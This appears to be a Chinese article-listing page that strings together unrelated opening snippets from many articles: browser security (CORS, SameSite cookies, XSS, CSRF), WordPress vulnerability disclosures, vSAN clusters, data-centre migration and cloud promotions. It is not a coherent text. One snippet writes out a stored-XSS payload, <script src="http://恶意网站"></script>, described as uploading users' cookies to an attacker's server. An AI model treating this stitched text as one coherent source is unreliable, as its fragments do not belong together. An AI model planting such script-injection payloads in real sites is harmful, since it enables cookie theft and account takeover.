大家好,我是 ConardLi,今天和大家一起来看一下 Chrome 隐私沙盒的最新进展。
Chrome 80 版本在 2020年2月份 正式发布了,随后又陆续更新了几个小版本,本次升级主要是更新了安全修复和稳定性改进以及用户体验优化。
笔者之前也分享过vSAN延伸集群的一些资料。在双活的设计中,站点之间带宽预估、脑列处理等问题,都是需要重点考虑的。本次向大家分享一下vSAN带宽带宽的设计原则。建议读者参照此前我分享过的《VMware的灾备与双活----我在vForum 2015分会场的分享(2)》一起进行阅读,这篇文章中已经包含的内容,本文将不再进行赘述。 一. 总体架构 vSAN延伸集群整体架构如下:一个有三个故障域,两个数据站点分别是一个故障域,仲裁站点是一个故障域。需要注意的是,vSAN延伸的三个故障域都属于是一个
大家好,很高兴来到GITC2016的舞台,我是来自58到家的沈剑,今天我分享的主题是《58到家从IDC到云端架构迁移之路》。 机房迁移是一个很大的动作: 15年在58同城实施过一次(“逐日”项目),几千台物理机,从IDC迁到了腾讯的天津机房,项目做了10个多月,跨所有的部门,与所有的业务都相关; 16年在58到家又实施了一次(“凌云”项目),几百台虚拟机,从IDC迁到阿里云,前后大概一个季度的时间,也是所有技术部门都需要配合的一个大项目。 “单机房架构-全连” 要说机房迁移,先来看看被迁移的系统是一个什么样
SameSite cookie 推出已一年有余,自己看了不少文章,也撞了不少南墙,所以还是那句好记性不如烂笔头。你可能觉得自己懂了,但试着讲出来,才能知道自己是否真的懂了。
转发一则联邦学习开源项目 FATE Cloud的消息: 随着联邦学习FATE开源生态的不断发展,目前已经诞生了诸多基于FATE框架的功能模块及落地应用。此前,FATE开源生态已发布了KubeFATE、FATE-Board、FATE Serving 等模块。 作为首个工业级的云端联邦学习管理工具以及构建和管理联邦数据合作网络的基础设施——FATE Cloud V1.0,已在GitHub正式发布。 关于FATE Cloud FATE Cloud 是在联邦学习FATE开源框架的基础上,
我们通常提到跨域问题的时候,相信大家首先会想到的是 CORS(跨源资源共享),其实 CORS 只是众多跨域访问场景中安全策略的一种,类似的策略还有:
同源策略(Same origin policy)是一种约定,它是浏览器最核心也最基本的安全功能,如果缺少了同源策略,则浏览器的正常功能可能都会受到影响。可以说Web是构建在同源策略基础之上的,浏览器只是针对同源策略的一种实现。
大家好,我是 ConardLi,今天我们继续来聊 Cookie 。还是三方 Cookie 的问题,我们先回顾一下:
最近有用 vue 然后调 face++的 api 做一个前端人脸识别的需求,其中使用了 axios 作为 http 请求库,配置浏览器 cors 限制时遇到了一些不太一样的问题,写篇博客记录一下。
研究人员披露了一个影响三个不同 WordPress 插件的安全漏洞,这些插件影响了超过 84,000 个网站,并且可能被恶意行为者滥用以接管易受攻击的网站。
IBM AppScan 安全扫描:提示Cookie 中缺少 Secure 属性
安全三要素:机密、完整、可用 客户端安全:浏览器安全、跨站点脚本攻击、跨站点请求伪造、点击劫持
2015年底的时候,到家集团启动了一个“凌云”项目,将所有系统从北京的M6机房迁移到阿里云,完成技术栈“上云”。项目涉及几百台机器,到家所有的业务,所有的系统,需要所有技术部门配合,耗时超过一个季度,是一个不折不扣的大项目。
XSS通常是由带有页面解析内容的数据未经处理直接插入页面上解析导致的。而XSS根据攻击脚本的引入位置又可以分为以下三种:
NVo3体系框架只是要求隧道构建在IP网络上,并没有要求一定是要端到端的,因此DC间跨越Internet进行互联的一些技术也属于NVo3框架中。这类技术往往部署在汇聚层设备上,隧道起于DC边缘,终止于DC边缘。 其实DC间互联就是典型的VPN业务,早期的DC间互联就是通过传统的二层VPN来实现的,但是在向云数据中心演化中,这类技术表现出了如下的缺陷: 由于传统的二层VPN依赖于数据泛洪以确定MAC地址的可达性,“大二层”中庞大的虚拟机规模导致了大量泛洪包被发到Internet上。 STP和HSRP需要跨DC
一、什么是防盗链 网站资源都有域的概念,浏览器加载一个站点时,首先加载这个站点的首页,一般是index.html或者index.php等。页面加载,如果仅仅 是加载一个index.html页面,那么该页面里面只有文本,最终浏览器只能呈现一个文本页面。丰富的多媒体信息无法在站点上面展现。 那么我们看到的各类元素丰富的网页是如何在浏览器端生成并呈现的?其实,index.html在被解析时,浏览器会识别页面源码中的 img,script等标签,标签内部一般会有src属性,src属性一般是一个绝对的URL地址或者相
检查是否存在公开内容的文件,如robots.txt、sitemap.xml、.DS_Store检查主要搜索引擎的缓存中是否存在可公开访问的站点
WordPress 5.0.1 现已推出,这是自 WordPress 3.7 以来所有版本的安全版本,强烈建议用户立刻进行更新。此外还提供适用于插件开发者说明,让自己的插件能够兼容 5.0.1。WordPress 5.0.1 主要修复一下安全漏洞和错误:
CSRF(Cross-site request forgery)跨站请求伪造,也被称为“One Click Attack”或者Session Riding,通常缩写为CSRF或者XSRF,是一种对网站的恶意利用。尽管听起来像跨站脚本(XSS),但它与XSS非常不同,XSS利用站点内的信任用户,而CSRF则通过伪装来自受信任用户的请求来利用受信任的网站。与XSS攻击相比,CSRF攻击往往不大流行(因此对其进行防范的资源也相当稀少)和难以防范,所以被认为比XSS更具危险性。
thr0cyte,Gr33k,花花,MrTools,R1ght0us,7089bAt
作者简介:张磊,思科原厂8年多technical consulting engineer,精通思科数据中心/园区网产品及技术;精通SAN网络架构及产品;熟悉广域网产品及技术。
利用漏洞提交恶意 JavaScript 代码,比如在input, textarea等所有可能输入文本信息的区域,输入<script src="http://恶意网站"></script>等,提交后信息会存在服务器中,当用户再次打开网站请求到相应的数据,打开页面,恶意脚本就会将用户的 Cookie 信息等数据上传到黑客服务器。
出于安全原因,浏览器会限制发起跨源的 HTTP 请求,包括浏览器限制发起跨站请求,或者跨站请求可以正常发起,但是返回结果被浏览器拦截了。
随着技术的不断发展,应用安全会逐渐在各个领域扮演越来越重要的角色。在应用安全为主题角度,相对来说比较全面的指导,OWASP Cheat Sheet Series应该不能不被提及,如下:
《多机房多活架构,究竟怎么玩?》说明了在机房迁移的过程中,一定有一个“多机房多活”的中间状态:
概念 CSRF全称即Cross Site Request forgery,跨站点请求伪造,攻击者通过跨站点进行伪造用户的请求进行合法的非法操作,其攻击手法是通过窃取用户cookie或服务器session获取用户身份,在用户不知情的情况下在攻击者服务器模拟伪造用户真实的请求。 防御手段 既然是跨站点攻击,所以防御的手段无非是识别请求的来源是否合法。 防御的手段一般有: 1、检查referer referer是http header的请求头属性,标识了请求的来源地址,通过检查这个属性可以判断请求地址是否合法
ASP.NET 安全 概述 安全在web领域是一个永远都不会过时的话题,今天我们就来看一看一些在开发ASP.NET MVC应用程序时一些值得我们注意的安全问题。本篇主要包括以下几个内容 : 认证 授权 XSS跨站脚本攻击 跨站请求伪造 认证 所谓认证,简单的来说就是验证一个用户的身份。这取决于我们开发的站点的类型,是否允许匿名访问,是否是属于管理员或者其它角色的用户等等。也就是说我们的整个程序或者某些功能是针对某些特定的用户开发的,那么我们可能就要进行认证来确定用户的身份。需要注意的是,认证与授权是
可组合性是 Web 的非常强大的一项能力,你可以轻而易举的加载来自不同来源的资源来增强网页的功能,例如:font、image、video 等等。
通过将分散、孤立、异构的业务应用统一迁移到云计算环境,在空间和地理位置上,为数据共享创造外部条件。统一到云计算的旗帜下将有助于数据交换和迁移,云计算也因如此备受推崇,并逐渐演变为潮流和方向。
用户通常期望在浏览网络时保持隐私,不希望让网站知道他们之前访问了哪些站点或是否已登录其他网站。然而,被攻击者恶意控制的网站可能通过浏览器的一些方法来获取这些信息,而用户并不知情。这些网站可以在后台与其他网站进行互动,从而收集用户的个人数据。这种攻击方式被称为Cross-Site Leaks(XS-Leaks)。虽然这类漏洞早有报道,但之前的报告通常只是发现了个别实例,并未进行系统的研究。
1、类型 1)反射型:通过网络请求参数中加入恶意脚本,解析后执行触发。 2)文档型:请求传输数据中截取网络数据包,对html代码插入再返回。 3)存储型:通过输入发送到服务端存储到数据库。 2、防范措施 1)对用户输入进行过滤或转码。 2)csp(内容安全策略)。 使CSP可用, 你需要配置你的网络服务器返回 HTTP头部
通常,缓存可以通过存储数据来提高性能,从而可以更快后面相同数据的请求。例如,来自网络的缓存资源可以避免频繁的和服务器交互。缓存计算结果可以省去进行相同计算的时间。
今天继续聊 浏览器策略 ,这是我 「浏览器策略解读」 专栏的第 35 篇文章了,感谢读者们一如既往的支持!
web通信(洋名:web messaging)是一种文档中独立的浏览上下文间的DOM不会被恶意的跨域脚本暴露数据分享方式。
对于浏览器用户来说,访问网络资源只需要一台个人终端,终端有可运行浏览器的操作系统、浏览器应用、连通互联网,互联网连接可用的服务,这便是整体运行环境,其中任何环节被攻击都有可能带来安全问题,根据上诉描述,从微观到宏观、从局部到整体来对安全分类
如图用户通过源站点页面可以正常访问源站点服务器接口,但是也有可能被钓鱼进入伪站点来访问源服务器,如果伪站点通过第三方或用户信息拼接等方式获取到了用户的信息(如cookie),直接访问源站点的服务器接口进行关键性操作(例如支付扣款或返回用户隐私信息等操作),此时如果源站点服务器未做校验防护,伪站点的请求操作就可以被成功执行。另一种情况则可能是盗刷源站点的登录等接口来暴力破解用户密码的情况,如果源站点不添加防护措施,用户信息就极可能被盗取。
WVS(Web Vulnerablity Scanner)是一个自动化的Web应用程序安全测试工具,它可以扫描任何可通过Web浏览器访问和遵循HTTP/HTTPS规则的Web站点和Web应用程序。适用于任何中小型和大型企业的内联网,外延网和面向客户,雇员,厂商和其它人员的Web网站。WVS可以通过检查SQL注入攻击漏洞,XSS跨站脚本攻击漏洞等漏洞来审核Web应用程序的安全性。
Web 应用防火墙(Web Application Firewall, WAF)通过对 HTTP(S) 请求进行检测,识别并阻断 SQL 注入、跨站脚本攻击、跨站请求伪造等攻击,保护 Web 服务安全稳定。
《从混合云到分布式云 (上篇)》(以下简称《上篇》)发出来后,有位老友转发了文章并添加了评论“混合云除了出现在PPT,现实是不存在的”。所以,在谈混合云案例之前,得首先回答一个问题:混合云在现实中存在吗?
2021 年 11 月 11 日,Wordfence 威胁情报团队针对我们在“Photoswipe Masonry Gallery”中发现的一个漏洞启动了负责任的披露流程,这是一个安装在 10,000 多个站点上的 WordPress 插件。此漏洞使经过身份验证的攻击者可以注入恶意 JavaScript,每当站点管理员访问 PhotoSwipe 选项页面或用户访问带有插件创建的图库的页面时,该恶意 JavaScript 就会执行。
JIRA Trigger Plugin JiraTestResultReporter plugin Jira Issue Updater JIRA Pipeline Steps
2016年中国网络空间安全年报 日前,由安恒信息风暴中心策划编撰的《2016年中国网络空间安全年报》重磅发布。《2016年中国网络空间安全年报》旨在从安全大数据的视角,围绕“数据决策治理、数据带动思考、数据推动创新”的理念,跨地域、跨系统、跨行业地“数读”中国网络空间安全现状和趋势,为广大读者提供更加量化和全面的网络空间安全立体图景,希望给各级主管部门、各级领导单位网络安全治理参考和启发,为推动我国网络强国建设提供决策支持。 在1月23日-2月5日期间,我们将通过连载的方式对《2016年中国网络空间安全年
领取专属 10元无门槛券
手把手带您无忧上云
云服务器
ICP备案
对象存储
即时通信 IM
实时音视频
